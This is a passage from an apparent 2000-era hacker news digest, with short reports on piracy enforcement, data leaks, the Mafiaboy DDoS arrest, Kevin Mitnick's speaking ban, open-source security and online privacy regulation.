The distribution programs have flooded out far too widely for law enforcement to stop all cases of illegal copying. Unlike Napster, many programs in this new breed operate peer-to-peer, so there's no central site for investigators to target. The cuffs aren't digital But brace yourself for some serious arrests. "People say you can't do anything about speeding," says Randy Thysse, supervisory special agent at FBI headquarters in Washington, D.C. "But [you can] park a cruiser on the side of the road to slow people down." So watch for that virtual patrol car, and expect more than a ticket. Thysse advocates jail time for software and music buccaneers -- and starting next month, judges may go along with him. Convicted copyright offenders can receive jail time under new sentencing guidelines that take effect May 1. The policies cover intellectual property offenses on an emergency interim basis, and stem from the 1997 No Electronic Theft Act. "It's getting increasingly easy to swap software and increasingly hard to catch pirates," says John Wolfe, manager of investigations for the Business Software Association. "These new sentencing guidelines give law enforcement some real ammunition." I fought the law and the law... won? While the Justice Department has shown a great resolve to stop computer piracy, until now criminal penalties have been limited. They are too small to justify the big price tags of investigation and prosecution, says the FBI's Thysse. The BSA and others are betting that high-profile busts will send a clear message to intellectual property crooks.
"The odds are you aren't going to get caught," says Wolfe, but you'll never know. You're taking a two-pronged risk when you use these file-swapping tools, points out Nick of the Customs Department. As part of the process, you open your PC to the public so you can download files. This exposes your PC to hackers and viruses. It also exposes you legally. You're a private Netizen when you're simply surfing, but when you open a subdirectory of your PC, you've changed your online status and have become a de facto server, subject to law enforcement investigations. And if they bust you, they can take your equipment. Clearly, law enforcement is doing more than sabre-rattling. But as an aside, Nick comments that it's also time the music industry developed better digital safeguards instead of relying on electronic cops. Peeking into the secret-sharers What does this controversy look like from the other side? I took a look at Gnutella, one of dozens of these new-breed file-swapping programs popping up all over the Net. It connects you to a peer-to-peer distributed network -- basically, a 24-hour impromptu digital swap meet online. Like similar programs, it is clumsy but powerful. Once Gnutella is installed, you must designate a directory on your computer to make "public" and one to receive downloaded files. Connect to the Internet, and the program automatically links you to thousands of people running Gnutella on their PCs. Once connected, your "public" directory and anything in it become part of a gargantuan keyword-searchable database. You can request MP3s, games, software applications, and music videos. Your request moves quickly from computer to computer, returning links to files. Simply click on the files you want, and programs begin to download. Napster, it should be noted, is aimed at music files, while Gnutella has a broader reach. No, PC World does not condone illegal copying of files, and neither does the quasi-official Gnutella site. 
"There is nothing inherently illegal about sharing files," points out Ian Hall-Beyer, host of the site. But it's clearly a popular pastime. With the Gnutella "monitor" function selected, you can watch in astonishment, as I did, as anonymous users scanned my public directory looking for everything from Windows 2000 and Photoshop to X-rated images and Britney Spears MP3s. (Outta luck, guys!) And at any given moment, hundreds of people are running Gnutella, Napigator, Wrapster, Napster, and similar programs that are still surfacing. They're busily downloading files -- some of them perfectly legally -- but now the feds have them in their spyglass.

@HWA

74.0 [HNN] Brazil Tax Records on the Loose
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 18th
contributed by EviL Wench
The Sao Paulo Crime Laboratory has confirmed that the tax records of 11.5 million Brazilian taxpayers have been leaked to a direct mail marketing firm. Officials have not released how the information was compromised. The data reportedly was from 1998 tax returns and included the names, incomes, addresses, telephone numbers, activities and other information of 7.6 million individuals and 3.9 million companies.

Nando Times
http://www.nandotimes.com/technology/story/0,1643,500193192-500262160-501356912-0,00.html Dead Url

@HWA

75.0 [HNN] SingNet Suffers Abuse From Overseas
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 18th
contributed by Evil Wench
The Singapore ISP SingNet is facing increasing problems from fraud from overseas users. SingNet provides a service known as Global Roaming which allows users to connect to a local ISP to use its services to prevent long distance phone charges. SingNet says that about fifty users a month are targeted as fraudulent.
Straits Times http://www.straitstimes.asia1.com/singapore/sin20_0407.html Dead Url @HWA 76.0 [HNN] Attrition Graphs ~~~~~~~~~~~~~~~~~~~~~~ April 18th contributed by munge Attrition.org has collected some rather interesting data regarding web page defacements that shows some clear trends in the defacements by the OS. Attrition.org http://www.attrition.org/news/content/00-04-16.001.html @HWA 77.0 [HNN] Wide Open Source ~~~~~~~~~~~~~~~~~~~~~~ April 18th contributed by Brian Is Open Source really more secure than closed? Elias Levy says there's a little security in obscurity. "Most open source users run the software, but don't personally read the code. They just assume that someone else will do the auditing for them, and too often, it's the bad guys." Security Focus http://www.securityfocus.com/commentary/19 Wide Open Source Is Open Source really more secure than closed? Elias Levy says there's a little security in obscurity. By Elias Levy April 16, 2000 11:59 PM PT One of the great rallying cries from the Open Source community is the assertion that Open Source Software (OSS) is, by its very nature, less likely to contain security vulnerabilities, including back doors, than closed source software. The reality is far more complex and nuanced. Advocates derive their dogmatic faith in the implicit security of Open Source code from the concept of "peer review," a cornerstone of the scientific process in which published papers and theories are scrutinized by experts other than the authors. The more peers that review the work, the less likely it is that it will contain errors, and the more likely it is to become accepted. Open Source apostles believe that releasing the source code for a piece of software subjects it to the same kind of peer review as a quantum physics theory published in a scientific journal. 
Other programmers, the theory goes, will review the code for security vulnerabilities, reveal and fix them, and thus the number of new vulnerabilities introduced and discovered in the software will decrease over time when compared to similar closed source software. It's a nice theory, and in the ideal Open Source world, it would even be true. But in the real world, there are a variety of factors that affect how secure Open Source Software really is. Sure, the source code is available. But is anyone reading it? If Open Source were the panacea some think it is, then every security hole described, fixed and announced to the public would come from people analyzing the source code for security vulnerabilities, such as the folks at OpenBSD, the Linux Auditing Project, or the developers or users of the application. But there have been plenty of security vulnerabilities in Open Source Software that were discovered, not by peer review, but by black hats. Some security holes aren't discovered by the good guys until an attacker's tools are found on a compromised site, network traffic captured during an intrusion turns up signs of the exploit, or knowledge of the bug finally bubbles up from the underground. Why is this? When the security company Trusted Information Systems (TIS) began making the source code of their Gauntlet firewall available to their customers many years ago, they believed that their clients would check for themselves how secure the product was. What they found instead was that very few people outside of TIS ever sent in feedback, bug reports or vulnerabilities. Nobody, it seems, is reading the source. The fact is, most open source users run the software, but don't personally read the code. They just assume that someone else will do the auditing for them, and too often, it's the bad guys. 
Even if people are reviewing the code, that doesn't mean they're qualified to do so. In the scientific world, peer review works because the people doing the reviewing possess a comparable, or higher, technical caliber and level of authority on the subject matter than the author. It is generally true that the more people reviewing a piece of code, the less likely it is the code will have a security flaw. But a single well-trained reviewer who understands security and what the code is trying to accomplish will be more effective than a hundred people who just recently learned how to program. It is easy to hide vulnerabilities in complex, little understood and undocumented source code. Old versions of the Sendmail mail transport agent implemented a DEBUG SMTP command that allowed the connecting user to specify a set of commands instead of an email address to receive the message. This was one of the vulnerabilities exploited by the notorious Morris Internet worm. Sendmail is one of the oldest examples of open source software, yet this vulnerability, and many others, lay unfixed a long time. For years Sendmail was plagued by security problems, because this monolithic program was very large, complicated, and little understood but for a few. Vulnerabilities can be a lot more subtle than the Sendmail DEBUG command. How many people really understand the ins and outs of a kernel based NFS server? Are we sure it's not leaking file handles in some instances? Ssh 1.2.27 is over seventy-one thousand lines of code (client and server). Are we sure a subtle flaw is not weakening its key strength to only 40-bits? There is no strong guarantee that source code and binaries of an application have any real relationship. All the benefits of source code peer review are irrelevant if you can not be certain that a given binary application is the result of the reviewed source code. 
Ken Thompson made this very clear during his 1983 Turing Award lecture to the ACM, in which he revealed a shocking, and subtle, software subversion technique that's still illustrative seventeen years later. Thompson modified the UNIX C compiler to recognize when the login program was being compiled, and to insert a back door in the resulting binary code such that it would allow him to login as any user using a "magic" password. Anyone reviewing the compiler source code could have found the back door, except that Thompson then modified the compiler so that whenever it compiled itself, it would insert both the code that inserts the login back door, as well as code that modifies the compiler. With this new binary he removed the modifications he had made and recompiled again. He now had a trojaned compiler and clean source code. Anyone using his compiler to compile either the login program, or the compiler, would propagate his back doors. The reason his attack worked is because the compiler has a bootstrapping problem. You need a compiler to compile the compiler. You must obtain a binary copy of the compiler before you can use it to translate the compiler source code into a binary. There was no guarantee that the binary compiler you were using was really related to the source code of the same. Most applications do not have this bootstrapping problem. But how many users of open source software compile all of their applications from source? A great number of open source users install precompiled software distributions such as those from RedHat or Debian from CD-ROMs or FTP sites without thinking twice whether the binary applications have any real relationship to their source code. While some of the binaries are cryptographically signed to verify the identity of the packager, they make no other guarantees. 
Until the day comes when a trusted distributor of binary open source software can issue a strong cryptographic guarantee that a particular binary is the result of a given source, any security expectations one may have about the source can't be transferred to the binary. Open Source makes it easy for the bad guys to find vulnerabilities. Whatever potential Open Source has to make it easy for the good guys to proactively find security vulnerabilities, also goes to the bad guys. It is true that a black hat can find vulnerabilities in a binary-only application, and that they can attempt to steal the source code to the application from its closed source. But in the same amount of time they can do that, they can audit ten different open source applications for vulnerabilities. A bad guy that can operate a hex editor can probably manage to grep source code for 'strcpy'. Security through obscurity is not something you should depend on, but it can be an effective deterrent if the attacker can find an easier target. So does all this mean Open Source Software is no better than closed source software when it comes to security vulnerabilities? No. Open Source Software certainly does have the potential to be more secure than its closed source counterpart. But make no mistake, simply being open source is no guarantee of security. Elias Levy is CTO of SecurityFocus.com, and the long-time moderator of BUGTRAQ, one of the most read security mailing lists on the Internet. He's served as a computer security consultant and security engineer, a UNIX software developer, network engineer and system administrator. @HWA 78.0 [HNN] Mafiaboy Charged for DDoS Attacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 19th contributed by Jon The Royal Canadian Mounted Police have charged mafiaboy early this morning in connection with the massive DDoS Attacks. Mafiaboy was originally arrested last February in connection with the attacks but was arrested again and charged over the weekend. 
The attacks crippled online giants such as Yahoo, CNN, eBay, ZD Net. The investigation was conducted jointly by the computer investigation unit of the RCMP, the FBI, the U.S. Justice Department and others. The RCMP will be holding a press conference today at 10:30a. Associated Press - via ABC News RCMP http://abcnews.go.com/sections/tech/DailyNews/webattacks000419.html http://www.rcmp.ca/html/press.htm ABC News' ‘Mafiaboy’ Arrested Canadian Teen Charged in Web Attacks Kevin Schmidt, campus network programmer at the University of California at Santa Barbara, shows the computer at the Engineering Department that detected an unauthorized entry into the university computers. (Kevork Djansezian/AP Photo) By Jonathan Dube and Brian Ross April 19 — A 15-year-old Canadian who goes by the online moniker “Mafiaboy” has been arrested in connection with the February attacks on major Web sites, ABCNEWS has learned. Canadian authorities obtained a search warrant for the teen’s home in the Montreal area over the weekend and confiscated computer-related equipment suspected of being used in the February attacks against major Web sites in the U.S. Mafiaboy, whose identity is protected under Canadian law, was arrested on April 15 and charged with “two counts of mischief to data” for the attack that jammed up to 1,200 CNN-hosted Web sites for about two hours Feb. 8, said Inspector Yves Roussel of the Royal Canadian Mounted Police at a press conference this morning. After appearing in Youth Court Tuesday, the 15-year-old was released on bail under the condition that he not use a computer without a teacher present and he not visit stores that sell computers or related equipment. The Web attacks alarmed Internet users across the globe and shook the e-commerce industry because of the ease with which major sites were made inaccessible. 
The attackers took over computers around the world and used them to bombard victims’ sites with so much data that users could not access them. School Computer Used in Attacks Investigators were able to trace the attacks to Mafiaboy by examining the log files of a computer at a University of California at Santa Barbara research lab, which was among those used to attack the CNN.com site. A hacker electronically broke into the UCSB computer on Feb. 8 and instructed it to send large amounts of traffic to CNN.com’s Web site, campus network programmer Kevin Schmidt told ABCNEWS.com. Roussel also said that the suspect’s bragging about his exploits in chat rooms frequented by hackers like Internet Relay Chat (IRC) had helped lead investigators to Mafiaboy. Revealing Chat Room Logs ABCNEWS.com first reported that Mafiaboy was one of the top suspects in the attacks on Feb. 16. The FBI had obtained chat room logs showing that Mafiaboy asked others what sites he should take down — before the sites were attacked. Internet security expert Michael Lyle told ABCNEWS.com at the time that he communicated with Mafiaboy and the 15-year-old claimed credit for attacking not only CNN.com but also E*TRADE and several smaller sites. Mafiaboy also shared technical information that only someone involved in the attacks would know, Lyle said. “Mafiaboy was saying ‘What should I hit next? What should I hit next?’ and people on the channel were suggesting sites, and Mafiaboy was saying, ‘OK, CNN,’” said Lyle, the chief technology officer for Recourse Technologies Inc., an Internet security company in Palo Alto, Calif. “And shortly thereafter the people on the channel would be talking about CNN going down. If you look at the time stamps on the logs, they also coincide with CNN going down.” Lyle said the log files show similar discussions prior to the Feb. 9 attacks on E*TRADE and several other smaller sites. 
A subscriber called “Mafiaboy” previously held two accounts with Delphi Supernet, a Montreal Internet service provider that Toronto-based ISP Internet Direct bought last year. The accounts were closed in March 1998 because Mafiaboy violated subscriber policies, but Internet Direct would not say what the violations entailed. Authorities are unable to release specifics about the investigation because it is ongoing, but both Roussel and the FBI’s William Lynn indicated there could be more arrests. “A massive international crime investigation into the remaining denial of service attacks continues,” said Lynn. ABCNEWS' Simon Surowicz contributed to this report. @HWA 79.0 [HNN] TerraServer Downtime Blamed on Malicious Activity ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 19th contributed by root66 After posting satellite pictures of the almost mythical Area 51 (Groom Dry Lake Air Force Base), an Air Force testing and training facility www.terraserver.com received over three times the normal traffic of 700,000 visitors in a day. When the server failed to respond to additional requests the company blamed malicious intruders attempting to bypass their firewall. (I'm sure three million visitors had nothing to do with it.) USA Today Associated Press http://www.usatoday.com/life/cyber/tech/cth737.htm http://dailynews.yahoo.com/h/ap/20000418/us/area_51_8.html USA today; 06/07/00- Updated 07:49 PM ET Area 51 site invaded by impish earthlings Aerial photos of alleged UFO base target of hacker high jinks Apparently the good stuff's been moved to Area 52. This satellite image of Groom Dry Lake AFB, known to UFO aficionados as Area 51, was taken by a Russian satellite in March 1998. (AP) RALEIGH, N.C. (AP) - Many Internet surfers ran into roadblocks Tuesday when they tried to reach a Web site displaying the first detailed satellite images to be made public of Area 51, the supersecret Air Force test site that UFO buffs think is a repository of alien technology. 
Was it hackers, as the company said? Or a case for The X-Files? The photos of the Nevada test site don't show any readily apparent signs of flying saucers or little green men among the Air Force base buildings and roadways. Raleigh-based Aerial Images Inc. - in collaboration with Kodak, Digital Equipment Corp., Autometric Inc. and the Russian agency Sovinformsputnik - posted five images of the hush-hush desert proving ground on the Web on Monday. ''This is the first glimpse into the most secret training and testing facility for the Air Force,'' said John Hoffman, president of Aerial Images. However, the partners' Web site, www.terraserver.com, didn't respond much of the time Tuesday. ''The site is being hammered, and hackers are attacking it,'' Hoffman said. He said there were signs of hackers trying to penetrate the site's firewall, the software designed to prevent unauthorized outsiders from tampering with computer files. They couldn't reach the data, but they were able to slow the system, Hoffman said. He noted that the Area 51 photos had attracted an estimated 3 million ''page views'' to the Web site since Monday morning, compared with the normal usage of 700,000 to 800,000 per day. Viewing the images is free; downloading them costs $8.95 and up. Kodak will make prints for $20 to $30. The Air Force only recently acknowledged that Area 51 - the Groom Dry Lake Air Force Base - even exists. The 8,000-square-mile base is 75 miles northwest of Las Vegas, in the rugged Nellis Range. Beginning with the U-2 spy plane in the 1950s, the base has been the testing ground for a host of top-secret aircraft, including the SR-71 Blackbird, the F-117A stealth fighter and B-2 stealth bomber. The site is known as Area 51 among UFO aficionados because that was the base's designation on old Nevada test site maps. Some believe alien vehicles, unidentified flying objects, are hidden at the base and their parts are copied for U.S. prototypes. 
Aerial Images launched a Russian satellite in 1998 to map the Earth's surface under an open-skies agreement signed in 1992 by 24 nations, including the United States and Russia. The images have resolution good enough to distinguish a car from a truck. Several government agencies are aware of the new images and haven't responded, said Hoffman, 52. ''I've had no feedback from anybody that indicates anybody gives a hoot,'' he said. ''We acknowledge having an operating site there, and the work is classified,'' Air Force spokeswoman Gloria Cales said. The work involves ''operations critical to the U.S. military and the country's security.'' The images show hundreds of buildings including living quarters, tennis courts, a baseball field, a track and a swimming pool, plus craters in the ground. Visible roads are not paved and there are no parking lots; buses are the only visible vehicles. Some of the roads appear to run into cliffs, suggesting an underground network. Chris Carter, creator of The X-Files, apparently was skeptical when Hoffman told him of the satellite images. Some of the show's favorite themes are UFOs and secret government activities. ''He clearly didn't believe me,'' Hoffman said. ''From his tone, you could tell he didn't believe me that we had Area 51 and we had the whole area covered.'' (AREA 51, The groom lake facility uprooted and moved ages ago, it is now located in White Sands... - Ed) @HWA 80.0 [HNN] Ranum To Receive Clue Award ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 19th contributed by Bill The Internet Security Conference (TISC) will present the inaugural TISC CLUE Award to Marcus Ranum, internet security pioneer and CEO of Network Flight Recorder, Inc. The TISC CLUE Award is given to those individuals who have demonstrated that they indeed have a clue regarding Internet security systems issues, design and deployment. (WooHooo, Marcus!) The TISC CLUE Award presentation will take place Wednesday, April 26th from 12:45:00 p.m. to 1:00 p.m. 
at the Fairmont Hotel in San Jose, California. The TISC CLUE Award presentation is open to the public free of charge. TISC http://tisc.corecom.com @HWA 81.0 [HNN] Ireland Eases Restrictions on Encryption Export Procedures ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 19th contributed by root66 Ireland, the world's largest computer software exporter, said it is relaxing rules governing the export of mass market cryptographic items used in electronic commerce to make it easier for companies to sell abroad. The Irish government said it would no longer require software companies operating in Ireland to apply for export licenses for individual products or countries. Bloomberg http://quote.bloomberg.com/fgcgi.cgi?ptitle @HWA 82.0 [HNN] Web Defacement Supports Separatists ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 19th contributed by William Knowles The web page of the Guggenheim museum in the Basque city of Bilbao was defaced last weekend by supporters of the Basque separatist group ETA. (Unfortunately the Associated Press decided to label this childish act of vandalism as sabotage. Rather strong for a web page defacement.) Associated Press - via Las Vegas Sun http://www.lasvegassun.com/sunbin/stories/tech/2000/apr/17/041700923.html Dead Url @HWA 83.0 [HNN] Exploits Protected by Copyright ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 19th contributed by Dogcow An Australian newspaper is reporting that malicious netizens may be able to claim copyright infringement in an interesting twist on copyright law in Australia that prevents reverse engineering without the permission of the copyright holder. The reverse engineering of certain tools to aid in prosecution could be prevented unless done with the copyright holder's permission. 
Australian IT http://www.australianit.com.au/common/story_page/0,2405,582282%255E18%252D04%252D2000%255E,00.html Hackers can claim copyright on tools DAVID HELLABY ANTI-HACKER groups face problems giving evidence against groups or individuals using software developed for breaking into computer systems, because of a bizarre twist in copyright laws. Australian Computer Emergency Response Team co-founder Rob McMillan said anybody who reverse-engineered a hacking tool to see how it worked ran a risk using the evidence in court because it could be a breach of the author's copyright. The evidence may have been illegally obtained and therefore be inadmissible, he said. AusCERT was working with local lawmakers to close the loophole in intellectual property legislation, he said. "I don't know of any cases of hackers claiming copyright, but some have large enough egos to consider it," Mr McMillan said. US legislators had tackled the problem, he said. The distributed denial of service attacks that shut down several large US Web sites in February used software tools developed by hackers and distributed over the Internet. Local companies and organisations were under unprecedented attack this year, Mr McMillan said. There had been more computer security incidents reported in the first three months this year than for the whole of last year. About 2000 incidents ranging from scanning of systems to denial of service attacks were reported to AusCERT to the end of March. Mr McMillan warned the security situation was not likely to improve. "We are on the verge of a major leap in technology, but as our knowledge increases so does the knowledge of those we are up against," he said. Contrary to what some thought, AusCERT was not an enforcement organisation but assisted members with advice on dealing with security situations, he said. It was often unable to report incidents to police because a member organisation that had suffered an attack did not want it reported. 
But AusCERT maintained a good relationship with law enforcement authorities and often acted as a conduit for information from people and organisations that did not want to be identified, he said. @HWA 84.0 [HNN] The Erosion of Privacy on the Net ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 19th contributed by root66 Looks like we missed it when it first came out but the March 20 edition of Business Week has an excellent story on the state of online privacy today. They theorize where the future could go and just how bad it might get. If you have been sitting idly by ignoring the privacy issues we suggest you read this. Business Week http://www.businessweek.com/2000/00_12/b3673001.htm It's Time for Rules in Wonderland Here's Business Week's four-point plan to solve the Internet privacy mess If Lewis Carroll had written about Alice's adventures today, she would find herself passing through the looking glass and into cyberspace. She would meet up with dodos, duchesses, and eggheads, some of whom would spout the rough equivalent of '''Twas brillig, and the slithy toves....'' The journey also would be full of rude surprises. As in Carroll's books, she would eventually discover who she really was. But many others she had never met would learn about her, too. Indeed, with every click of the mouse, a bit more of her privacy would vanish down the rabbit hole. These days, a lot of people are stumbling on similar unpleasant surprises. Thanks to a string of privacy gaffes involving DoubleClick (DCLK), RealNetworks (RNWK), Amazon.com (AMZN), and other major Web sites, consumers are learning that e-commerce companies have an intense interest in their private information. For about 9 cents, some medical data sites will sell you your neighbor's history of urinary tract infections. Your speeding tickets, bounced checks, and delayed child-support payments are an open book. 
In the background, advertising services are building profiles of where people browse, what they buy, how they think, and who they are. Hundreds of sites already are stockpiling this type of information--some to use in targeted advertising, others to sell or trade with other sites. GOLD RUSH. It will get worse. The tricks being played today are child's play compared with what's coming. Web sites that want to know you better will soon be able to track your movements on Web phones, palm devices, and video games, and parse the data with more subtle software. Online services can be layered with mounds of data about each person. Interactive TVs, for instance, have the potential to correlate the Web sites you visit at work with the ads you see at home in the evening. Web surfers don't need extra proof that this gold rush for personal data is alarming. In a new Business Week/Harris Poll (page 96), 92% of Net users expressed discomfort about Web sites sharing personal information with other sites. The public outcry has grown so loud that in February, search engine AltaVista Co. promised to ask explicit permission before sharing visitors' personal information with other companies. On Mar. 2, DoubleClick bowed to public pressure on a similar point: The company, which serves up ads on many Web sites, has created anonymous digital snapshots, or ''profiles,'' of millions of cybersurfers, based on where they browse and what they do online. DoubleClick had planned to link profiles with much more specific information, including names and addresses culled from real-world databases that cover 90% of American households. The company dropped that controversial plan, and within days, smaller rival 24/7 Media Inc. abandoned a similar strategy. Anonymous tracking and profiling by DoubleClick and 24/7 can be very subtle. But sometimes privacy violations hit you in the face. We have all heard the examples of sociopaths who stalk their victims online. 
We have seen the statistics on ''identity theft,'' in which criminals suck enough personal data off the Net to impersonate other people. Perhaps these are extreme examples. Even without them, many cybersurfers are starting to feel that they have spent quite enough time at this particular Mad Tea Party. They are ready for privacy rules that set some plain and simple boundaries. In the March Business Week/Harris Poll, 57% of respondents said government should pass laws on how personal information is collected. ''What's going on today is exponentially more threatening to those who want to protect privacy,'' says Eliot Spitzer, New York's state attorney general who has proposed privacy legislation. People can't make informed decisions on the Net because they lack the necessary information. ''What we're confronting is a market failure,'' says Spitzer. Responding to a growing chorus of privacy-related complaints, some states have drafted legislation ranging from curtailing the sale of personal information to the creation of a privacy ombudsman. But this piecemeal, state-by-state approach is a muddle. Scattershot laws will only create more confusion. Over time, they will choke budding e-business in complex litigation and red tape. Business Week believes there is a better way. Instead of a conflicting patchwork of state rules, the federal government should adopt clear privacy standards in the spirit of the Fair Information Practices--a philosophical framework for privacy protection that has been adopted worldwide over the past 25 years. The broad principles are essential: -- Companies conducting business online should be required by law to disclose clearly how they collect and use information. -- Consumers must be given control of how their data are used. -- Web surfers should also have the ability to inspect that data and to correct any errors they discover. -- And when companies break the rules, the government must have the power to impose penalties. 
''All of these bits you are sending out are your digital DNA,'' says Tara Lemmey, president of the Electronic Frontier Foundation. ''You should have control of that.'' Regulation flies in the face of the approach industry has been championing. For the past four years, Net companies have insisted that they can police themselves on privacy. ''Industry initiatives and market forces are already doing a good job,'' says Daniel J. Jaye, co-founder of Engage Technologies Inc., which dishes up ads on the Web. In other words, the market will punish companies that fall afoul of consumers. Bringing in the government, execs say, will pile bureaucratic layers on top of the Net. This could undercut the very promise of efficiency that many online businesses are counting on. The Internet, they say, is supposed to draw companies closer to their customers, allowing them to anticipate their desires. With profile data, they can target their ads, slash wasteful and random marketing costs, design products faster, and build higher profit margins. Profiling provides the underpinnings of a new way of doing business upon which the Net Economy is built. Laws that require businesses to seek users' permission before they collect or use data about Web-surfing habits could kill this goose, they say. And why do that, industry execs ask, when they are making such fine strides in protecting consumer privacy? As a positive sign, Net businesses trumpet a May, 1999, Federal Trade Commission survey in which 66% of companies queried had privacy policies. SELF-REGULATORY SHAM. We are not persuaded by these arguments. Few Web sites give consumers real choices over the data that get collected online. There is no proof that if given a choice--especially bolstered with financial incentives proffered by Web merchants--consumers won't willingly hand over some personal data. 
As for privacy policies, the same FTC survey showed that while more than 90% of companies polled collected personal information, fewer than 10% actually followed all of the established Fair Information Practices. In short, self-regulation is a sham. The policies that companies have posted under pressure from the government are as vague and confusing as anything Lewis Carroll could have dreamed up. One simple example: When people register at Yahoo! Inc. (YHOO) for one of its services, such as My Yahoo, they are asked to provide their birth date and e-mail address--ostensibly as a safeguard if they forget their user name and need prompting. But Yahoo also uses that information for a service called the Birthday Club, sending product offers from three to five merchants to users via e-mail on their birthday. Don't look for transparency here. Most sites don't limit how they or their partners use consumer information. And Web sites can transfer information to partners without telling their own customers. Many sites also change their practices at will and without warning. Because privacy breaches are so corrosive to consumer trust, some Web execs actually welcome broad national standards. IBM (IBM) and Walt Disney Co. (DIS) have decided not to advertise on Web sites that don't have privacy policies. Privacy codes must be clearer, says Chris Larsen, CEO and founder of E-Loan Inc. (EELN), an online loan service that has its privacy policies audited. ''I think the industry has squandered the opportunity to take care of this on its own.'' IBM Chairman Louis Gerstner doesn't go that far. But he has warned Net executives that they must get serious. ''I am troubled, very troubled, by leaders who have failed to recognize our responsibility in the transformation of the new economy,'' he says. We hope other Web execs are listening closely. The policies we propose are in the best interests of Web businesses. 
If more consumers can be assured that their personal information is safe, more of them will flock to the Net--and click, not exit.

There are other explicit benefits for the industry. Privacy standards create a level playing field, so companies don't fall into an arms war, each trying to collect the most data--at any cost. ''Business will benefit from the right level of government involvement,'' says Nick Grouf, founder of PeoplePC, which offers cheap PCs and Net connections. ''Standards are good, but they need some teeth, and this is where government becomes a good partner.''

FEDERAL STANDARD. In the long term, the privacy protection that Business Week espouses will make life simpler for businesses on the Net. More than 20 states already are moving to enact some kind of guarantees. A minimum federal standard of online privacy would decrease the cost and complexity for companies. It also would increase trust. If businesses really want to be close to their customers, trust is paramount.

This approach also will shrink the gap that has arisen between the U.S. and Europe, where privacy already is recognized as a right. The Europeans have stood firm, putting American companies in the peculiar position of extending greater privacy protection in Germany or France than at home. It's time to iron out the inconsistencies. Here are our prescriptions for protecting personal privacy without jeopardizing the promise of e-commerce...

@HWA

85.0 [HNN] MafiaBoy Released on Bail
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 21st

contributed by Macki

MafiaBoy, a fifteen year old teenager from Montreal, has been released on bail after appearing Monday in Youth Court for having been accused of launching a DDoS attack on CNN. He was released under bail conditions that included a ban on connecting to the Internet or going to libraries, universities, stores and other places with public access to computers or computer equipment.
An RCMP investigator said the boy was tracked through traces he left of his computer activity. (The interesting part is that he has only been charged with the CNN attack which means he either covered his tracks rather well on the others or there are more perpetrators yet to be found.)

Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,500194839-500265475-501381121-0,00.html

MafiaBoy IRC Logs

2600 Magazine has posted what they say are IRC logs of someone posing as Mafiaboy to investigators. Hopefully the FBI is not using these same fake logs as evidence.

2600.com
http://www.2600.com/news/2000/0420.html

@HWA

86.0 [HNN] Mitnick Banned from Speaking
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 21st

contributed by William Knowles

A Federal Judge has ruled that Kevin Mitnick can not speak at the Utah Information Technologies Association conference in Salt Lake City. The Judge felt that the conference was "consulting or advising" which is prohibited by his probation agreement. Organizers are hoping to fill the slot with an industry executive.

Deseret News
http://deseretnews.com/dn/view/0,1249,160008642,00.html?

Federal judge bans convicted hacker from taking part in tech conference

A federal judge Monday banned convicted computer hacker Kevin Mitnick from taking part in a technology conference in Salt Lake City Wednesday.

Mitnick, who gained notoriety for his hacking exploits and spent several years in a federal prison in Lompoc, Calif., won't be sitting on a computer security panel discussion at the Utah Information Technologies Association conference at the Salt Palace Convention Center.

The judge kiboshed the appearance because Mitnick's prison release agreement prohibits him from "consulting or advising" on the topic of computer-related activity.

Monday, Mitnick did an extended interview promoting the panel discussion on KSL's Doug Wright Show, where he answered callers' questions about computer security and told the story of his hacking exploits.
He hacked for fun, he said, and never made any money from it.

Richard Nelson, president of UITA, said Mitnick's public relations representative had indicated that Mitnick had permission to appear from the U.S. probation office in California. A few days ago, the organization learned he might not be able to leave California.

Conference organizers are in the process of arranging a replacement for Mitnick on the cyber-security panel. They are planning on bringing in a senior staffer from a large company that deals with cyber security.

Nelson said he's sorry Mitnick can't participate. "He's eager to talk and disappointed he can't come. If you listened (to him on the radio show), he recognizes he made serious mistakes and he wanted to go forward.

"We're not trying to promote his career, but if he can help information technology companies in Utah and decision makers dealing with security issues determine what level of risk they want to take, that's good. There will always be risk, but you can reduce it by taking security measures."

The UITA conference, "Net Trends 2000: The Digital Revolution" takes place Wednesday and Thursday.

@HWA

87.0 [HNN] Top Politicos Meet to Discuss Infrastructure Security
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 21st

contributed by Weld Pond

We have seen numerous press reports regarding a recent meeting at the Old Executive office building in support of the Critical Information Assurance Office. Several top level officials attended the meeting. Probably the best description of the event we have found was posted by Russ Cooper to NTBugTraq.

NT BugTraq
http://www.NTBUGTRAQ.COM/default.asp?pid

Not found. Tried searching archives but didn't spend too much time.
- Ed

@HWA

88.0 [HNN] NSF To Issue Grants for Security Schooling
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 21st

contributed by mortel

Applications for grants for the Federal Cyber Services program should be released by the National Science Foundation next month. The grants will be used by Colleges and Universities to award scholarships to students studying information security.

Federal Computer Week
http://www.fcw.com/fcw/articles/2000/0417/web-cyber-04-19-00.asp

NSF launching grants for cybercorps

BY Colleen O’Hara
04/19/2000

The National Science Foundation is expected to release applications next month for grants that would fund the Federal Cyber Services program designed to train the next generation of digital defenders.

The NSF grants would be available to colleges and universities, which would use the money to award scholarships to students to study information assurance. These students would receive the scholarships in exchange for full-time employment with a federal agency upon graduation. The students would help protect the government’s systems from cyberattack.

NSF hopes to announce by September or October which schools will receive the grants and hopes to award the actual student scholarships by January 2001, said Shirley Malia, program manager for education and training with the government’s Critical Infrastructure Assurance Office, speaking at the FOSE conference.

